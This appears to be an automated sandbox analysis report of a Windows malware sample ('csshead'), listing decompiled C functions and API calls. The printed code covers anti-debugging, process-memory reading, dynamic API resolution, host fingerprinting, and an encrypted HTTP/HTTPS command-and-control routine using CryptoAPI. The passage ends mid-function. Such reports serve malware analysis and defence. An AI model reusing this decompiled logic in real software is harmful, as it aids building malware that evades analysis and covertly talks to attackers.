    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F10
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F23
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalFix.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnWire.KERNEL32(00000000), ref: 00418012
    • lstrlen.KERNEL32(00000000), ref: 00418031
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00404DE0(void* __eax, void* __eflags) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				void _v20;
    				long _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v12 = 0;
    				E00401258( &_v52, 0x18);
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
    				if(_v16 == 0 && _v48 != 0) {
    					_v20 = _v48 + 8;
    					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
    					_v20 = _v28 + 0x3c;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v20 = _v20 + _v28 + 0x28;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v12 = _v20 + _v28;
    				}
    				return _v12;
    			}

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • IsWindow.USER32(0000E900), ref: 0041E9D0
    • IsWindow.USER32(?), ref: 0041E9E3
    • GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 004250D5
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 004250DF
    • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00000000), ref: 004250EC
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsWindow.USER32(?), ref: 0041019A
    • GetWindowLongA.USER32(?,000000FC), ref: 004101B4
    • SetWindowLongA.USER32(?,000000FC,?), ref: 004101CF
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 98%
    			E00405D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				char _v168;
    				char _v184;
    				char _v200;
    				char _v204;
    				char _v269;
    				char _v285;
    				char _v301;
    				char _v317;
    				intOrPtr _v324;
    				intOrPtr _v328;
    				intOrPtr _v332;
    				char _v336;
    				char _v849;
    				intOrPtr _t239;
    				signed int _t250;
    				char _t255;
    				intOrPtr _t256;
    				intOrPtr _t257;
    				intOrPtr _t259;
    				signed int _t330;
    				intOrPtr _t436;
    				intOrPtr _t438;
    				void* _t470;
    
    				_v8 = 0;
    				if(_a16 == 0) {
    					L40:
    					return _v8;
    				}
    				_v64 = 0;
    				if(_a20 == 0) {
    					__eflags = 0;
    					_v28 = 0;
    					L9:
    					_v60 = E00401110(_a16, E0040633C);
    					_t474 = _v60;
    					if(_v60 == 0) {
    						goto L40;
    					}
    					_v32 = _v60 - _a16;
    					E004012B8( &_v269, _v32, _a16);
    					 *((char*)(_t470 + _v32 - 0x109)) = 0;
    					E00401308( &_v849, _v60);
    					E004054B8( &_v849, _v60, _t474);
    					E00405858( &_v301, 0x10);
    					E00405858( &_v317, 0x10);
    					E004012B8( &_v184, 0x10,  &_v301);
    					E004012B8( &_v200, 0x10,  &_v317);
    					_v204 = _a28;
    					if(_a12 != 0) {
    						E004012B8( &_v168, 0x51, _a12);
    					}
    					E004017E8( &_v48, 0, 0, 0xf0000000, 1);
    					E004018A0(_v48, 0x94, _a8,  &_v56, 0, 0);
    					_v32 = 0x75;
    					E00401AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
    					E00401AF8(_v56);
    					E00401B20(_v48, 0);
    					E00401268( &_v204, 0x80);
    					_t239 =  *0x40a1c0; // 0x401f00
    					_v12 = E00403864(_t239, _v28, _v64, 0, 0);
    					_v28 = 1;
    					E0040170C(_v12,  &_v28, 0x46, 4);
    					_v28 = 0x1770;
    					E0040170C(_v12,  &_v28, 2, 4);
    					_v28 = 0x1f40;
    					E0040170C(_v12,  &_v28, 6, 4);
    					E0040170C(_v12,  &_v28, 5, 4);
    					_v28 = 1;
    					_t250 = E0040170C(_v12,  &_v28, 0x4d, 4);
    					asm("sbb eax, eax");
    					if( ~( ~_t250) == 0) {
    						_v76 = 1;
    						_v72 = 0;
    						E0040170C(0,  &_v76, 0x32, 8);
    					}
    					if(_a4 == 0) {
    						_v28 = 0x50;
    					} else {
    						_v28 = 0x1bb;
    					}
    					_v16 = E0040161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0);
    					if(_a4 == 0) {
    						_v28 = 0x4600000;
    					} else {
    						_v28 = 0x4e03000;
    					}
    					_t255 =  *0x40a1c4; // 0x401f48
    					_v336 = _t255;
    					_t256 =  *0x40a1c8; // 0x401f54
    					_v332 = _t256;
    					_t257 =  *0x40a1cc; // 0x401f6c
    					_v328 = _t257;
    					_v324 = 0;
    					_t259 =  *0x40a23c; // 0x40209c
    					_t436 =  *0x40a1ac; // 0x401ed4
    					_v20 = E00401660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
    					if(_a4 != 0) {
    						_v32 = 4;
    						E004016D8(_v20,  &_v28, 0x1f,  &_v32);
    						_v28 = _v28 | 0x00000100;
    						E0040170C(_v20,  &_v28, 0x1f, 4);
    					}
    					_t482 = _a24;
    					if(_a24 == 0) {
    						_v68 = E004013DC(_v32 + 0x80);
    						_t397 = 0x80;
    						E004012B8(_v68, 0x80,  &_v204);
    						__eflags = 0;
    						_v32 = 0;
    					} else {
    						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
    						_v68 = E004013DC(_v32 + 0x80);
    						E004012B8(_v68, 0x80,  &_v204);
    						_t397 =  &_v301;
    						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
    					}
    					_t438 =  *0x40a1d0; // 0x401f70
    					if(E004015E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68) != 0) {
    						E00401440(_v68);
    						_v32 = 4;
    						_v24 = 0;
    						_v28 = 0;
    						E004039CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
    						__eflags = _v24 - 0x12e;
    						if(_v24 != 0x12e) {
    							goto L39;
    						}
    						_v40 = E004013DC(0x1000);
    						__eflags = 0;
    						_v36 = 0;
    						while(1) {
    							_v44 = E004016A4(_v20, 0,  &_v32, 0);
    							asm("sbb eax, eax");
    							__eflags =  ~( ~_v44);
    							if( ~( ~_v44) == 0) {
    								goto L39;
    							}
    							__eflags = _v44;
    							if(_v44 == 0) {
    								continue;
    							}
    							__eflags = _v32;
    							if(_v32 == 0) {
    								__eflags = _v36 - 0x20;
    								if(_v36 >= 0x20) {
    									 *_a32 = E004013DC(_v36 + 1);
    									 *_a36 = _v36;
    									E004059BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
    									E004017E8( &_v48, 0, 0, 0xf0000000, 1);
    									E00401374(_v48, 0, 0x8003,  &_v52, 0);
    									E00401404(_v52, 0x10,  &_v301, 0);
    									E00401404(_v52, 0x10,  &_v317, 0);
    									E00401404(_v52, E004012DC( &_v269),  &_v269, 0);
    									E00401404(_v52,  *_a36,  *_a32, 0);
    									_v32 = 0x10;
    									E00401490(_v52,  &_v285, 2, 0,  &_v32);
    									E004014D0(_v52);
    									E00401B20(_v48, 0);
    									_t330 = E004011F8( &_v285, 0x10, _v40);
    									__eflags = _t330;
    									if(_t330 != 0) {
    										E00401440(_v40);
    										 *((char*)( *_a32 +  *_a36)) = 0;
    										_v8 = 0xffffffff;
    									} else {
    										E00401440(_v40);
    										E00401440( *_a32);
    										 *_a32 = 0;
    										 *_a36 = 0;
    									}
    								} else {
    									E00401440(_v40);
    								}
    								goto L39;
    							}
    							__eflags = _v36 + _v32 - 0x200000;
    							if(_v36 + _v32 > 0x200000) {
    								goto L39;
    							}
    							_v40 = E00401460(_v40, _v36 + _v32);
    							E004015B0(_v20, _v32, _v40 + _v36,  &_v32);
    							_v36 = _v36 + _v32;
    						}
    						goto L39;
    					} else {
    						E00401440(_v68);
    						L39:
    						E0040151C(_v20);
    						E0040151C(_v16);
    						E0040151C(_v12);
    						goto L40;
    					}
    				}
    				if( *_a20 != 1) {
    					__eflags =  *_a20 - 2;
    					if( *_a20 != 2) {
    						__eflags =  *_a20 - 3;
    						if( *_a20 != 3) {
    							goto L40;
    						}
    						_v28 = 3;
    						_v64 = _a20 + 4;
    						goto L9;
    					}
    					_v28 = 0;
    				} else {
    					_v28 = 1;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 58%
    			E00408A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				void* _t12;
    				void* _t24;
    
    				_t12 = _a8 - 2;
    				if(_t12 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t12 == 0xf) {
    						E004078FC(_a16 & 0x80000000, _t24);
    						_v8 = 1;
    					} else {
    						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
    					}
    				}
    				return _v8;
    			}

    APIs
    • PostQuitMessage.USER32(00000000), ref: 00408A5F
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401928(CHAR* __eax) {
    				CHAR* _v8;
    				_Unknown_base(*)()* _v12;
    				CHAR* _v16;
    				intOrPtr _v20;
    				char _v149;
    				void* _t37;
    
    				_v8 = __eax;
    				_v16 = _v8;
    				while( *_v16 != 0x2e) {
    					_v16 =  &(_v16[1]);
    				}
    				_v20 = _v16 - _v8;
    				E004012B8( &_v149, _v20, _v8);
    				 *((char*)(_t37 + _v20 - 0x91)) = 0;
    				_v16 =  &(_v16[1]);
    				_v12 = GetProcAddress(LoadLibraryA( &_v149), _v16);
    				return _v12;
    			}

    APIs
    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 0040197A
    • GetProcAddress.KERNEL32(00000000), ref: 00401981
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 84%
    			E00403988(CHAR* __eax) {
    				CHAR* _v8;
    				signed char _v12;
    				void* _v16;
    				struct _WIN32_FIND_DATAA _v336;
    				signed int _t16;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t16 = FindFirstFileA(_v8,  &_v336);
    				_v16 = _t16;
    				asm("sbb eax, eax");
    				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
    				FindClose(_v16);
    				return _v12;
    			}

    APIs
    • FindFirstFileA.KERNEL32(?,?), ref: 004039A4
    • FindClose.KERNEL32(000000FF), ref: 004039BF
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401460(void* __eax, long __edx) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = RtlReAllocateHeap(GetProcessHeap(), 0, _v8, _v12);
    				return _v16;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00401476
    • RtlReAllocateHeap.NTDLL(00000000), ref: 0040147D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • ___mtold12.LIBCMT ref: 00431063
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004064BC(char* __eax, char __edx, void* __eflags) {
    				char* _v8;
    				char _v9;
    				struct _OSVERSIONINFOA _v168;
    				char _v233;
    				intOrPtr _t68;
    
    				_v9 = __edx;
    				_v8 = __eax;
    				E00401258(_v8, 0x51);
    				 *_v8 = _v9;
    				E004012B8(_v8 + 0x10, 0x12, 0x40b719);
    				E004012B8(_v8 + 1, E004012DC(0x40b794), 0x40b794);
    				E00401258( &_v168, 0x9c);
    				_v168.dwOSVersionInfoSize = 0x9c;
    				GetVersionExA( &_v168);
    				E00401864(_v168.dwMajorVersion,  &_v233);
    				 *((char*)(_v8 + 0x22)) = _v233;
    				 *((char*)(_v8 + 0x23)) = 0x2e;
    				E00401864(_v168.dwMinorVersion,  &_v233);
    				 *((char*)(_v8 + 0x24)) = _v233;
    				_t68 =  *0x40a068; // 0x3
    				E00401864(_t68,  &_v233);
    				 *((char*)(_v8 + 0x26)) = _v233;
    				if( *0x40a058 == 0) {
    					 *((char*)(_v8 + 0x27)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x27)) = 0x31;
    				}
    				if( *0x40a034 == 0) {
    					 *((char*)(_v8 + 0x28)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x28)) = 0x31;
    				}
    				if(E00403EA0() == 0) {
    					 *((char*)(_v8 + 0x25)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x25)) = 0x31;
    				}
    				 *((intOrPtr*)(_v8 + 0x29)) = E00405468();
    				return E00401308(_v8 + 0x2d, 0x40b00c);
    			}

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 00406530
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
      • Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403ECD
      • Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403EF3
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00401AE5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004017A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}
    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004017A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}
    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004018A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
    				long* _v8;
    				BYTE* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b500)) != 0xe9) {
    					_v20 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}
    APIs
    • CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 004018D1
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 58%
    			E00408A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				intOrPtr _v117;
    				void* _t15;
    				void* _t27;
    
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				_t15 = _a12 - 2;
    				if(_t15 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t15 == 0xf) {
    						E004078FC(_a16 & 0x80000000, _t27);
    						_v8 = 1;
    					} else {
    						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
    					}
    				}
    				return _v8;
    			}
    APIs
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D
    • PostQuitMessage.USER32(00000000), ref: 00408A5F
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004017E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
    				HCRYPTPROV* _v8;
    				char* _v12;
    				char* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b4fc)) != 0xe9) {
    					_v20 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4);
    				}
    				return _v20;
    			}
    APIs
    • CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 00401815
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 004013A1
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 004014BD
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 0040159D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E0040153C(long* __eax, BYTE* __ecx, int __edx) {
